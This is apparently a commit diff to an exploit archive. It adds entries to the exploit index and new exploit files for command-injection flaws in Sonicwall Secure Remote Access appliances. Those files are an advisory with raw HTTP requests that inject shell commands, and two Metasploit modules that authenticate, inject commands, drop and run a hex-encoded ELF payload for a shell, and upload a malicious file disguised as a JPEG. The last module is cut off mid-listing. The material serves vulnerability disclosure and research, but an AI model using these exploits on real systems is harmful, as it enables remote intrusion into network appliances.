35407,platforms/php/webapps/35407.txt,"phpWebSite 1.7.1 - 'local' Parameter Cross-Site Scripting",2011-03-03,"AutoSec Tools",php,webapps,0 35407,platforms/php/webapps/35407.txt,"phpWebSite 1.7.1 - 'local' Parameter Cross-Site Scripting",2011-03-03,"AutoSec Tools",php,webapps,0
35408,platforms/php/webapps/35408.txt,"xtcModified 1.05 - Multiple HTML Injection / Cross-Site Scripting Vulnerabilities",2011-03-03,"High-Tech Bridge SA",php,webapps,0 35408,platforms/php/webapps/35408.txt,"xtcModified 1.05 - Multiple HTML Injection / Cross-Site Scripting Vulnerabilities",2011-03-03,"High-Tech Bridge SA",php,webapps,0
35409,platforms/php/webapps/35409.txt,"Pragyan CMS 3.0 Beta - Multiple Cross-Site Scripting Vulnerabilities",2011-03-03,"High-Tech Bridge SA",php,webapps,0 35409,platforms/php/webapps/35409.txt,"Pragyan CMS 3.0 Beta - Multiple Cross-Site Scripting Vulnerabilities",2011-03-03,"High-Tech Bridge SA",php,webapps,0
35410,platforms/windows/webapps/35410.py,"InterPhoto Image Gallery 2.4.2 - 'IPLANG' Parameter Local File Inclusion",2011-03-04,"AutoSec Tools",windows,webapps,0
35411,platforms/asp/webapps/35411.txt,"Kodak InSite 5.5.2 - Troubleshooting/DiagnosticReport.asp HeaderWarning Parameter Cross-Site Scripting",2011-03-07,Dionach,asp,webapps,0 35411,platforms/asp/webapps/35411.txt,"Kodak InSite 5.5.2 - Troubleshooting/DiagnosticReport.asp HeaderWarning Parameter Cross-Site Scripting",2011-03-07,Dionach,asp,webapps,0
35412,platforms/asp/webapps/35412.txt,"Kodak InSite 5.5.2 - Pages/login.aspx Language Parameter Cross-Site Scripting",2011-03-07,Dionach,asp,webapps,0 35412,platforms/asp/webapps/35412.txt,"Kodak InSite 5.5.2 - Pages/login.aspx Language Parameter Cross-Site Scripting",2011-03-07,Dionach,asp,webapps,0
35416,platforms/php/webapps/35416.txt,"Interleave 5.5.0.2 - 'basicstats.php' Multiple Cross-Site Scripting Vulnerabilities",2011-03-03,"AutoSec Tools",php,webapps,0 35416,platforms/php/webapps/35416.txt,"Interleave 5.5.0.2 - 'basicstats.php' Multiple Cross-Site Scripting Vulnerabilities",2011-03-03,"AutoSec Tools",php,webapps,0
@ -34725,6 +34720,7 @@ id,file,description,date,author,platform,type,port
35583,platforms/php/webapps/35583.txt,"Piwigo 2.7.2 - Multiple Vulnerabilities",2014-12-19,TaurusOmar,php,webapps,80 35583,platforms/php/webapps/35583.txt,"Piwigo 2.7.2 - Multiple Vulnerabilities",2014-12-19,TaurusOmar,php,webapps,80
35584,platforms/php/webapps/35584.txt,"GQ File Manager 0.2.5 - Multiple Vulnerabilities",2014-12-19,TaurusOmar,php,webapps,80 35584,platforms/php/webapps/35584.txt,"GQ File Manager 0.2.5 - Multiple Vulnerabilities",2014-12-19,TaurusOmar,php,webapps,80
35585,platforms/php/webapps/35585.txt,"Codiad 2.4.3 - Multiple Vulnerabilities",2014-12-19,TaurusOmar,php,webapps,80 35585,platforms/php/webapps/35585.txt,"Codiad 2.4.3 - Multiple Vulnerabilities",2014-12-19,TaurusOmar,php,webapps,80
35588,platforms/php/webapps/35588.rb,"Lotus Mail Encryption Server 2.1.0.1 (Protector for Mail) - Local File Inclusion / Remote Code Execution (Metasploit)",2014-12-22,"Patrick Webster",php,webapps,9000
35591,platforms/php/webapps/35591.txt,"PHPMyRecipes 1.2.2 - 'browse.php' 'category' Parameter SQL Injection",2014-12-23,"Manish Tanwar",php,webapps,80 35591,platforms/php/webapps/35591.txt,"PHPMyRecipes 1.2.2 - 'browse.php' 'category' Parameter SQL Injection",2014-12-23,"Manish Tanwar",php,webapps,80
35593,platforms/windows/webapps/35593.txt,"SysAid Server - Arbitrary File Disclosure",2014-12-23,"Bernhard Mueller",windows,webapps,0 35593,platforms/windows/webapps/35593.txt,"SysAid Server - Arbitrary File Disclosure",2014-12-23,"Bernhard Mueller",windows,webapps,0
35594,platforms/jsp/webapps/35594.txt,"NetIQ Access Manager 4.0 SP1 - Multiple Vulnerabilities",2014-12-23,"SEC Consult",jsp,webapps,8443 35594,platforms/jsp/webapps/35594.txt,"NetIQ Access Manager 4.0 SP1 - Multiple Vulnerabilities",2014-12-23,"SEC Consult",jsp,webapps,8443
@ -35158,6 +35154,7 @@ id,file,description,date,author,platform,type,port
36280,platforms/php/webapps/36280.txt,"Symphony 2.2.3 - symphony/publish/images filter Parameter Cross-Site Scripting",2011-11-01,"Mesut Timur",php,webapps,0 36280,platforms/php/webapps/36280.txt,"Symphony 2.2.3 - symphony/publish/images filter Parameter Cross-Site Scripting",2011-11-01,"Mesut Timur",php,webapps,0
36281,platforms/php/webapps/36281.txt,"Symphony 2.2.3 - symphony/publish/comments filter Parameter SQL Injection",2011-11-01,"Mesut Timur",php,webapps,0 36281,platforms/php/webapps/36281.txt,"Symphony 2.2.3 - symphony/publish/comments filter Parameter SQL Injection",2011-11-01,"Mesut Timur",php,webapps,0
36284,platforms/asp/webapps/36284.txt,"CmyDocument - Multiple Cross-Site Scripting Vulnerabilities",2011-11-03,demonalex,asp,webapps,0 36284,platforms/asp/webapps/36284.txt,"CmyDocument - Multiple Cross-Site Scripting Vulnerabilities",2011-11-03,demonalex,asp,webapps,0
36286,platforms/hardware/webapps/36286.txt,"DreamBox DM800 - 'file' Parameter Local File Disclosure",2011-11-04,"Todor Donev",hardware,webapps,0
36287,platforms/php/webapps/36287.txt,"WordPress Theme Bonus 1.0 - 's' Parameter Cross-Site Scripting",2011-11-04,3spi0n,php,webapps,0 36287,platforms/php/webapps/36287.txt,"WordPress Theme Bonus 1.0 - 's' Parameter Cross-Site Scripting",2011-11-04,3spi0n,php,webapps,0
36289,platforms/php/webapps/36289.txt,"SmartJobBoard - 'keywords' Parameter Cross-Site Scripting",2011-11-07,Mr.PaPaRoSSe,php,webapps,0 36289,platforms/php/webapps/36289.txt,"SmartJobBoard - 'keywords' Parameter Cross-Site Scripting",2011-11-07,Mr.PaPaRoSSe,php,webapps,0
36290,platforms/php/webapps/36290.txt,"Admin Bot - 'news.php' SQL Injection",2011-11-07,baltazar,php,webapps,0 36290,platforms/php/webapps/36290.txt,"Admin Bot - 'news.php' SQL Injection",2011-11-07,baltazar,php,webapps,0
@ -35540,6 +35537,7 @@ id,file,description,date,author,platform,type,port
36861,platforms/windows/webapps/36861.txt,"Wing FTP Server Admin 4.4.5 - Multiple Vulnerabilities",2015-04-29,hyp3rlinx,windows,webapps,5466 36861,platforms/windows/webapps/36861.txt,"Wing FTP Server Admin 4.4.5 - Multiple Vulnerabilities",2015-04-29,hyp3rlinx,windows,webapps,5466
36862,platforms/php/webapps/36862.txt,"OS Solution OSProperty 2.8.0 - SQL Injection",2015-04-29,"Brandon Perry",php,webapps,80 36862,platforms/php/webapps/36862.txt,"OS Solution OSProperty 2.8.0 - SQL Injection",2015-04-29,"Brandon Perry",php,webapps,80
36863,platforms/php/webapps/36863.txt,"Joomla! Component Machine - Multiple SQL Injections",2012-02-20,the_cyber_nuxbie,php,webapps,0 36863,platforms/php/webapps/36863.txt,"Joomla! Component Machine - Multiple SQL Injections",2012-02-20,the_cyber_nuxbie,php,webapps,0
36865,platforms/hardware/webapps/36865.txt,"Xavi 7968 ADSL Router - webconfig/lan/lan_config.html/local_lan_config host_name_txtbox Parameter Cross-Site Scripting",2012-02-21,Busindre,hardware,webapps,0
36867,platforms/php/webapps/36867.txt,"CPG Dragonfly CMS 9.3.3.0 - Multiple Multiple Cross-Site Scripting Vulnerabilities",2012-02-21,Ariko-Security,php,webapps,0 36867,platforms/php/webapps/36867.txt,"CPG Dragonfly CMS 9.3.3.0 - Multiple Multiple Cross-Site Scripting Vulnerabilities",2012-02-21,Ariko-Security,php,webapps,0
36870,platforms/php/webapps/36870.txt,"ContentLion Alpha 1.3 - 'login.php' Cross-Site Scripting",2012-02-22,"Stefan Schurtz",php,webapps,0 36870,platforms/php/webapps/36870.txt,"ContentLion Alpha 1.3 - 'login.php' Cross-Site Scripting",2012-02-22,"Stefan Schurtz",php,webapps,0
36873,platforms/php/webapps/36873.txt,"Dolibarr 3.2 Alpha - Multiple Directory Traversal Vulnerabilities",2012-02-22,"Benjamin Kunz Mejri",php,webapps,0 36873,platforms/php/webapps/36873.txt,"Dolibarr 3.2 Alpha - Multiple Directory Traversal Vulnerabilities",2012-02-22,"Benjamin Kunz Mejri",php,webapps,0
@ -36227,6 +36225,7 @@ id,file,description,date,author,platform,type,port
37977,platforms/xml/webapps/37977.py,"Magento eCommerce - Remote Code Execution",2015-08-26,"Manish Tanwar",xml,webapps,0 37977,platforms/xml/webapps/37977.py,"Magento eCommerce - Remote Code Execution",2015-08-26,"Manish Tanwar",xml,webapps,0
37978,platforms/php/webapps/37978.txt,"Gramophone - 'rs' Parameter Cross-Site Scripting",2012-10-25,G13,php,webapps,0 37978,platforms/php/webapps/37978.txt,"Gramophone - 'rs' Parameter Cross-Site Scripting",2012-10-25,G13,php,webapps,0
37979,platforms/php/webapps/37979.txt,"VicBlog - Multiple SQL Injections",2012-10-26,Geek,php,webapps,0 37979,platforms/php/webapps/37979.txt,"VicBlog - Multiple SQL Injections",2012-10-26,Geek,php,webapps,0
37982,platforms/hardware/webapps/37982.pl,"TP-Link TL-WR841N Router - Local File Inclusion",2012-10-29,"Matan Azugi",hardware,webapps,0
37983,platforms/php/webapps/37983.php,"EasyITSP - 'customers_edit.php' Authentication Bypass",2012-10-26,"Michal Blaszczak",php,webapps,0 37983,platforms/php/webapps/37983.php,"EasyITSP - 'customers_edit.php' Authentication Bypass",2012-10-26,"Michal Blaszczak",php,webapps,0
37989,platforms/php/webapps/37989.txt,"IP.Board 4.x - Persistent Cross-Site Scripting",2015-08-27,snop,php,webapps,0 37989,platforms/php/webapps/37989.txt,"IP.Board 4.x - Persistent Cross-Site Scripting",2015-08-27,snop,php,webapps,0
37991,platforms/php/webapps/37991.txt,"WANem - Multiple Cross-Site Scripting Vulnerabilities",2012-10-16,"Brendan Coles",php,webapps,0 37991,platforms/php/webapps/37991.txt,"WANem - Multiple Cross-Site Scripting Vulnerabilities",2012-10-16,"Brendan Coles",php,webapps,0
@ -36553,6 +36552,7 @@ id,file,description,date,author,platform,type,port
38596,platforms/php/webapps/38596.txt,"Xaraya - Multiple Cross-Site Scripting Vulnerabilities",2013-06-26,"High-Tech Bridge",php,webapps,0 38596,platforms/php/webapps/38596.txt,"Xaraya - Multiple Cross-Site Scripting Vulnerabilities",2013-06-26,"High-Tech Bridge",php,webapps,0
38598,platforms/php/webapps/38598.txt,"ZamFoo - 'date' Parameter Remote Command Injection",2013-06-15,localhost.re,php,webapps,0 38598,platforms/php/webapps/38598.txt,"ZamFoo - 'date' Parameter Remote Command Injection",2013-06-15,localhost.re,php,webapps,0
38602,platforms/windows/webapps/38602.txt,"actiTIME 2015.2 - Multiple Vulnerabilities",2015-11-02,LiquidWorm,windows,webapps,0 38602,platforms/windows/webapps/38602.txt,"actiTIME 2015.2 - Multiple Vulnerabilities",2015-11-02,LiquidWorm,windows,webapps,0
38604,platforms/hardware/webapps/38604.txt,"Mobile USB Drive HD - Multiple Local File Inclusion / Arbitrary File Upload Vulnerabilities",2012-06-28,"Benjamin Kunz Mejri",hardware,webapps,0
38605,platforms/php/webapps/38605.txt,"Nameko - 'nameko.php' Cross-Site Scripting",2013-06-29,"Andrea Menin",php,webapps,0 38605,platforms/php/webapps/38605.txt,"Nameko - 'nameko.php' Cross-Site Scripting",2013-06-29,"Andrea Menin",php,webapps,0
38606,platforms/php/webapps/38606.txt,"WordPress Plugin WP Private Messages - 'msgid' Parameter SQL Injection",2013-06-29,"IeDb ir",php,webapps,0 38606,platforms/php/webapps/38606.txt,"WordPress Plugin WP Private Messages - 'msgid' Parameter SQL Injection",2013-06-29,"IeDb ir",php,webapps,0
38607,platforms/php/webapps/38607.txt,"Atomy Maxsite - 'index.php' Arbitrary File Upload",2013-06-30,Iranian_Dark_Coders_Team,php,webapps,0 38607,platforms/php/webapps/38607.txt,"Atomy Maxsite - 'index.php' Arbitrary File Upload",2013-06-30,Iranian_Dark_Coders_Team,php,webapps,0
@ -36667,6 +36667,7 @@ id,file,description,date,author,platform,type,port
38844,platforms/php/webapps/38844.html,"WordPress Plugin Blue Wrench Video Widget - Cross-Site Request Forgery",2013-11-23,"Haider Mahmood",php,webapps,0 38844,platforms/php/webapps/38844.html,"WordPress Plugin Blue Wrench Video Widget - Cross-Site Request Forgery",2013-11-23,"Haider Mahmood",php,webapps,0
38848,platforms/php/webapps/38848.php,"WordPress Theme Suco - 'themify-ajax.php' Arbitrary File Upload",2013-11-20,DevilScreaM,php,webapps,0 38848,platforms/php/webapps/38848.php,"WordPress Theme Suco - 'themify-ajax.php' Arbitrary File Upload",2013-11-20,DevilScreaM,php,webapps,0
38852,platforms/php/webapps/38852.pl,"PHPThumb - 'PHPThumb.php' Arbitrary File Upload",2013-12-01,DevilScreaM,php,webapps,0 38852,platforms/php/webapps/38852.pl,"PHPThumb - 'PHPThumb.php' Arbitrary File Upload",2013-12-01,DevilScreaM,php,webapps,0
38853,platforms/hardware/webapps/38853.sh,"Multiple D-Link DIR Series Routers - 'model/__show_info.php' Local File Disclosure",2013-12-02,tytusromekiatomek,hardware,webapps,0
38855,platforms/php/webapps/38855.txt,"WordPress Plugin Users Ultra 1.5.50 - Blind SQL Injection",2015-12-03,"Panagiotis Vagenas",php,webapps,0 38855,platforms/php/webapps/38855.txt,"WordPress Plugin Users Ultra 1.5.50 - Blind SQL Injection",2015-12-03,"Panagiotis Vagenas",php,webapps,0
38856,platforms/php/webapps/38856.txt,"WordPress Plugin Users Ultra 1.5.50 - Persistent Cross-Site Scripting",2015-12-03,"Panagiotis Vagenas",php,webapps,0 38856,platforms/php/webapps/38856.txt,"WordPress Plugin Users Ultra 1.5.50 - Persistent Cross-Site Scripting",2015-12-03,"Panagiotis Vagenas",php,webapps,0
38861,platforms/php/webapps/38861.txt,"WordPress Plugin Gwolle Guestbook 1.5.3 - Remote File Inclusion",2015-12-03,"High-Tech Bridge SA",php,webapps,0 38861,platforms/php/webapps/38861.txt,"WordPress Plugin Gwolle Guestbook 1.5.3 - Remote File Inclusion",2015-12-03,"High-Tech Bridge SA",php,webapps,0
@ -38146,5 +38147,10 @@ id,file,description,date,author,platform,type,port
42326,platforms/hardware/webapps/42326.txt,"WDTV Live SMP 2.03.20 - Remote Password Reset",2017-07-14,Sw1tCh,hardware,webapps,0 42326,platforms/hardware/webapps/42326.txt,"WDTV Live SMP 2.03.20 - Remote Password Reset",2017-07-14,Sw1tCh,hardware,webapps,0
42330,platforms/php/webapps/42330.txt,"Orangescrum 1.6.1 - Multiple Vulnerabilities",2017-07-16,tomplixsee,php,webapps,0 42330,platforms/php/webapps/42330.txt,"Orangescrum 1.6.1 - Multiple Vulnerabilities",2017-07-16,tomplixsee,php,webapps,0
42332,platforms/json/webapps/42332.rb,"Sophos Web Appliance 4.3.0.2 - 'trafficType' Remote Command Injection (Metasploit)",2017-07-18,xort,json,webapps,0 42332,platforms/json/webapps/42332.rb,"Sophos Web Appliance 4.3.0.2 - 'trafficType' Remote Command Injection (Metasploit)",2017-07-18,xort,json,webapps,0
42333,platforms/hardware/webapps/42333.rb,"Barracuda Load Balancer Firmware <= 6.0.1.006 - Remote Command Injection (Metasploit)",2017-07-18,xort,hardware,webapps,0 42333,platforms/hardware/webapps/42333.rb,"Barracuda Load Balancer Firmware < 6.0.1.006 - Remote Command Injection (Metasploit)",2017-07-18,xort,hardware,webapps,0
42335,platforms/multiple/webapps/42335.txt,"PEGA Platform <= 7.2 ML0 - Missing Access Control / Cross-Site Scripting",2017-07-18,"Daniel Correa",multiple,webapps,0 42335,platforms/multiple/webapps/42335.txt,"PEGA Platform <= 7.2 ML0 - Missing Access Control / Cross-Site Scripting",2017-07-18,"Daniel Correa",multiple,webapps,0
42342,platforms/cgi/webapps/42342.txt,"Sonicwall Secure Remote Access 8.1.0.2-14sv - Command Injection",2017-07-19,xort,cgi,webapps,0
42343,platforms/cgi/webapps/42343.rb,"Sonicwall < 8.1.0.6-21sv - 'gencsr.cgi' Command Injection (Metasploit)",2017-07-19,xort,cgi,webapps,0
42345,platforms/cgi/webapps/42345.rb,"Netscaler SD-WAN 9.1.2.26.561201 - Command Injection (Metasploit)",2017-07-19,xort,cgi,webapps,0
42344,platforms/cgi/webapps/42344.rb,"Sonicwall < 8.1.0.2-14sv - 'sitecustomization.cgi' Command Injection (Metasploit)",2017-07-19,xort,cgi,webapps,0
42346,platforms/cgi/webapps/42346.txt,"Citrix CloudBridge - 'CAKEPHP' Cookie Command Injection",2017-07-19,xort,cgi,webapps,0

Can't render this file because it is too large.

60
platforms/cgi/webapps/42342.txt Executable file
View file

@ -0,0 +1,60 @@
Sonicwall Secure Remote Access (SRA) - Command Injection Vulnerabilities
Vendor: Sonicwall (Dell)
Product: Secure Remote Access (SRA)
Version: 8.1.0.2-14sv
Platform: Embedded Linux
Discovery: Russell Sanford of Critical Start (www.CriticalStart.com)
CVE: cve-2016-9682
Tested against version 8.1.0.2-14sv on 11/28/16 (fully updated)
Description:
The Sonicwall Secure Remote Access server (ver 8.1.0.2-14sv) is vulnerable to two Remote Command Injection vulnerabilities in it's
web administrative interface. These vulnerabilies occur in the diagnostics CGI (/cgi-bin/diagnostics) component responsible for
emailing out information about the state of the system. The application doesn't properly escape the information passed in the 'tsrDeleteRestartedFile'
or 'currentTSREmailTo' variables before making a call to system() allowing for remote command injection.
Exploitation of this vulnerability yeilds shell access to the remote machine under the useraccount 'nobody'
Impact:
Remote Code Execution
Exploit #1 -----------------------------------------------------------------
GET /cgi-bin/diagnostics?tsrEmailCurrent=true&currentTSREmailTo=|date>/tmp/xort||a%20%23 HTTP/1.1
Host: 192.168.84.155
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: https://192.168.84.155/cgi-bin/diagnostics
Cookie: SessURL=https%3A%2F%2F192.168.84.155%2Fcgi-bin%2Fwelcome; svDomainName=LocalDomain; activeUserSessionsTable=0; ajaxUpdates=ON; activeNxSessionsTable=0; servicesBookmarksTable=1; policyListTable=1; portalListTable=1; domainListTable=0; period=1; activeTab=4; curUrl=license; swap=dEVySFNhTXl5V3NLSXNWUFUzVzBNNTJJQ1o2WXpCODNrOGZYUGxYazJOZz0=
Exploit #2 -----------------------------------------------------------------
GET /cgi-bin/diagnostics?tsrDeleteRestarted=true&tsrDeleteRestartedFile=|date>/tmp/xort2||a%20%23 HTTP/1.1
Host: 192.168.84.155
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: https://192.168.84.155/cgi-bin/diagnostics
Cookie: SessURL=https%3A%2F%2F192.168.84.155%2Fcgi-bin%2Fwelcome; svDomainName=LocalDomain; activeUserSessionsTable=0; ajaxUpdates=ON; activeNxSessionsTable=0; servicesBookmarksTable=1; policyListTable=1; portalListTable=1; domainListTable=0; period=1; activeTab=4; curUrl=sslcert; swap=dDdWMjhSYzlzMEZBd3kwQ29rTzZxQWFKdmxUSU5SRFVBQTRGRWk5UzJXVT0=
Timeline:
11/14/16 - Discovered in audit
11/20/16 - POC msf exploit written
11/28/16 - Contacted mitre for CVE
11/30/16 - CVE received from mitre (CVE-2016-9682)
11/30/16 - Dell notified through Sonicwall vuln reporting

196
platforms/cgi/webapps/42343.rb Executable file
View file

@ -0,0 +1,196 @@
# Exploit Title: Sonicwall gencsr CGI Remote Command Injection Vulnerablity
# Date: 12/24/2016
# Exploit Author: xort @ Critical Start
# Vendor Homepage: www.sonicwall.com
# Software Link: sonicwall.com/products/sra-virtual-appliance
# Version: 8.1.0.6-21sv
# Tested on: 8.1.0.2-14sv
#
# CVE : (awaiting cve)
# vuln: viewcert.cgi / CERT parameter
# Description PostAuth Sonicwall SRA <= v8.1.0.2-14sv. This exploit leverages a command injection bug.
#
# xort @ Critical Start
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Exploit::Remote::Tcp
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Sonicwall SRA <= v8.1.0.2-14sv gencsr.cgi remote exploit',
'Description' => %q{
This module exploits a remote command execution vulnerability in
the Sonicwall SRA Appliance Version <= v8.1.0.2-14sv. The vulnerability exist in
a section of the machine's adminstrative infertface for performing configurations
related to on-connect scripts to be launched for users's connecting.
},
'Author' =>
[
'xort@Critical Start', # vuln + metasploit module
],
'Version' => '$Revision: 1 $',
'References' =>
[
[ 'none', 'none'],
],
'Platform' => [ 'linux'],
'Privileged' => true,
'Arch' => [ ARCH_X86 ],
'SessionTypes' => [ 'shell' ],
'Privileged' => false,
'Payload' =>
{
'Compat' =>
{
'ConnectionType' => 'find',
}
},
'Targets' =>
[
['Linux Universal',
{
'Arch' => ARCH_X86,
'Platform' => 'linux'
}
],
],
'DefaultTarget' => 0))
register_options(
[
OptString.new('PASSWORD', [ false, 'Device password', "" ]),
OptString.new('USERNAME', [ true, 'Device password', "admin" ]),
OptString.new('CMD', [ false, 'Command to execute', "" ]),
Opt::RPORT(443),
], self.class)
end
def do_login(username, password_clear)
vprint_status( "Logging into machine with credentials...\n" )
# vars
timeout = 1550;
# send request
res = send_request_cgi(
{
'method' => 'POST',
'uri' => "/cgi-bin/userLogin",
'headers' => {
'Connection' => 'close',
'Content-Type' => 'application/x-www-form-urlencoded',
'User-Agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0',
},
'vars_post' => {
'username' => username,
'password' => password_clear,
'domain' => 'LocalDomain',
'loginButton' => 'Login',
'state' => 'login',
'login' => 'true',
'VerifyCert' => '0',
'portalname' => 'VirtualOffice',
'ajax' => 'true'
},
}, timeout)
swap = res.headers['Set-Cookie'].split('\n').grep(/(.*)swap=([^;]+);/){$2}[0]
return swap
end
def run_command(swap_cookie, cmd)
# vars
timeout = 1550;
res = send_request_cgi({
'method' => 'POST',
'uri' => "/cgi-bin/gencsr",
'data' => "country=USA&san=ASDF&fqdn=www.google.com&county=dallas&applyButt=applyButt%3d&password=xxx&fullsan=xxx&organization=xxx&name=xxx&state=xxx&department=xxx&email=x@x.com&key_size=`#{cmd}`",
'headers' =>
{
'Cookie' => "swap=#{swap_cookie}",
},
}, timeout)
end
def run_command_spliced(swap_cookie, cmd)
write_mode = ">"
dump_file = "/tmp/qq"
reqs = 0
cmd_encoded = cmd.unpack("H*").join().gsub(/(\w)(\w)/,'\\x\1\2')
for cmd_chunk in cmd_encoded.split(/(..................................................)/)
cmd_new = "printf \"#{cmd_chunk}\"#{write_mode}#{dump_file}"
reqs += 1
vprint_status("Running Command (#{reqs})\n")
# set to normal append for loops after the first round
if write_mode == ">"
write_mode = ">>"
end
# add cmd to array to be exected later
run_command(swap_cookie, cmd_new)
end
# execute payload stored at dump_file
run_command(swap_cookie, "chmod +x /tmp/qq; sh /tmp/qq")
end
def exploit
# timeout
timeout = 1550;
# params
password_clear = datastore['PASSWORD']
user = datastore['USERNAME']
# do authentication
swap_cookie = do_login(user, password_clear)
vprint_status("authenticated 'swap' cookie: #{swap_cookie}\n")
#if no 'CMD' string - add code for root shell
if not datastore['CMD'].nil? and not datastore['CMD'].empty?
cmd = datastore['CMD']
# Encode cmd payload
encoded_cmd = cmd.unpack("H*").join().gsub(/(\w)(\w)/,'\\x\1\2')
# kill stale calls to bdump from previous exploit calls for re-use
run_command(swap_cookie, ("sudo /bin/rm -f /tmp/n; printf \"#{encoded_cmd}\" > /tmp/n; chmod +rx /tmp/n; /tmp/n" ))
else
# Encode payload to ELF file for deployment
elf = Msf::Util::EXE.to_linux_x86_elf(framework, payload.raw)
encoded_elf = elf.unpack("H*").join().gsub(/(\w)(\w)/,'\\x\1\2')
run_command_spliced(swap_cookie, "printf \"#{encoded_elf}\">/tmp/m;chmod +rx /tmp/m;/tmp/m")
# wait for magic
handler
end
end
end

316
platforms/cgi/webapps/42344.rb Executable file
View file

@ -0,0 +1,316 @@
# Exploit Title: Sonicwall importlogo/sitecustomization CGI Remote Command Injection Vulnerablity
# Date: 12/25/2016
# Exploit Author: xort @ Critical Start
# Vendor Homepage: www.sonicwall.com
# Software Link: sonicwall.com/products/sra-virtual-appliance
# Version: 8.1.0.2-14sv
# Tested on: 8.1.0.2-14sv
#
# CVE : (awaiting cve)
# vuln1: importlogo.cgi / logo1 parameter (any contents can be uploaded)
# vuln2: sitecustomization.cgi / portalname (filename) parameter
# Description PostAuth Sonicwall SRA <= v8.1.0.2-14sv. This exploit leverages a command injection bug.
#
# xort @ Critical Start
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Exploit::Remote::Tcp
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Sonicwall SRA <= v8.1.0.2-14sv remote exploit',
'Description' => %q{
This module exploits a remote command execution vulnerability in
the Sonicwall SRA Appliance Version <= v8.1.0.2-14sv. The vulnerability exist in
a section of the machine's adminstrative infertface for performing configurations
related to on-connect scripts to be launched for users's connecting.
},
'Author' =>
[
'xort@Critical Start', # vuln + metasploit module
],
'Version' => '$Revision: 1 $',
'References' =>
[
[ 'none', 'none'],
],
'Platform' => [ 'linux'],
'Privileged' => true,
'Arch' => [ ARCH_X86 ],
'SessionTypes' => [ 'shell' ],
'Privileged' => false,
'Payload' =>
{
'Compat' =>
{
'ConnectionType' => 'find',
}
},
'Targets' =>
[
['Linux Universal',
{
'Arch' => ARCH_X86,
'Platform' => 'linux'
}
],
],
'DefaultTarget' => 0))
register_options(
[
OptString.new('PASSWORD', [ false, 'Device password', "" ]),
OptString.new('USERNAME', [ true, 'Device password', "admin" ]),
OptString.new('CMD', [ false, 'Command to execute', "" ]),
Opt::RPORT(443),
], self.class)
end
def do_login(username, password_clear)
vprint_status( "Logging into machine with credentials...\n" )
# vars
timeout = 1550;
# send request
res = send_request_cgi(
{
'method' => 'POST',
'uri' => "/cgi-bin/userLogin",
'headers' => {
'Connection' => 'close',
'Content-Type' => 'application/x-www-form-urlencoded',
'User-Agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0',
},
'vars_post' => {
'username' => username,
'password' => password_clear,
'domain' => 'LocalDomain',
'loginButton' => 'Login',
'state' => 'login',
'login' => 'true',
'VerifyCert' => '0',
'portalname' => 'VirtualOffice',
'ajax' => 'true'
},
}, timeout)
swap = res.headers['Set-Cookie'].split('\n').grep(/(.*)swap=([^;]+);/){$2}[0]
return swap
end
def upload_payload(swap_cookie, file_data)
vprint_status( "Upload Payload..." )
# vars
timeout = 1550;
upload_req = [
[ "portalName","VirtualOffice" ],
[ "defaultLogo","0" ],
[ "uiVersion","2" ],
[ "bannerBackground", "light" ]
]
boundary = "---------------------------" + Rex::Text.rand_text_numeric(34)
post_data = ""
# assemble upload_req parms
upload_req.each do |xreq|
post_data << "--#{boundary}\r\n"
post_data << "Content-Disposition: form-data; name=\"#{xreq[0]}\"\r\n\r\n"
post_data << "#{xreq[1]}\r\n"
end
# add malicious file
post_data << "--#{boundary}\r\n"
post_data << "Content-Disposition: form-data; name=\"logo1\"; filename=\"x.jpg\"\r\n"
post_data << "Content-Type: image/jpeg\r\n\r\n"
post_data << "#{file_data}\r\n"
post_data << "--#{boundary}--\r\n"
res = send_request_cgi({
'method' => 'POST',
'uri' => "/cgi-bin/importlogo?uploadId=1",
'ctype' => "multipart/form-data; boundary=#{boundary}",
'data' => post_data,
'headers' =>
{
'UserAgent' => "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0",
'Cookie' => 'swap='+swap_cookie+';',
}
}, timeout)
end
def run_command(swap_cookie, cmd)
vprint_status( "Running Command...\n" )
# vars
timeout = 1550;
vprint_status("creating filename on target: #{cmd}\n")
upload_req = [
[ "portalname", cmd ],
[ "portaltitle","Virtual Office" ],
[ "bannertitle","Virtual Office" ],
[ "bannermessage","<h1>Dell Sonicwall</h1>" ],
[ "portalUrl","https://192.168.84.155/portal/xxx" ],
[ "loginflag","on" ],
[ "bannerflag","on" ],
[ "httpOnlyCookieFlag","on" ],
[ "cachecontrol","on" ],
[ "uniqueness", "on" ],
[ "duplicateLoginAction", "1" ],
[ "livetilesmalllogo", "" ],
[ "livetilemediumlogo", "" ],
[ "livetilewidelogo", "" ],
[ "livetilelargelogo", "" ],
[ "livetilebackground", "#0085C3" ],
[ "livetilename", "" ],
[ "home2page", "on" ],
[ "allowNetExtender", "on" ],
[ "virtualpassagepage", "on" ],
[ "cifsdirectpage", "on" ],
[ "cifspage", "on" ],
[ "cifsappletpage", "on" ],
[ "cifsapplet", "on" ],
[ "cifsdefaultfilesharepath", "" ],
[ "home3page", "on" ],
[ "showAllBookmarksTab", "on" ],
[ "showDefaultTabs", "on" ],
[ "showCopyright", "on" ],
[ "showSidebar", "on" ],
[ "showUserPortalHelpButton", "on" ],
[ "userPortalHelpURL", "" ],
[ "showUserPortalOptionsButton", "on" ],
[ "homemessage", "<h1>Welcome to the Dell SonicWALL Virtual Office</h1>" ],
[ "hptabletitle", "Virtual Office Bookmarks" ],
[ "vhostName", "www.#{Rex::Text.rand_text_hex(32)}.com" ],
[ "vhostAlias", "" ],
[ "vhostInterface", "ALL" ],
[ "vhostEnableKeepAlive", "on" ],
[ "cdssodn", ".yahoo.com" ],
[ "enableSSLForwardSecrecy", "0" ],
[ "enableSSLProxyVerify", "0" ],
[ "sslProxyProtocol", "0" ],
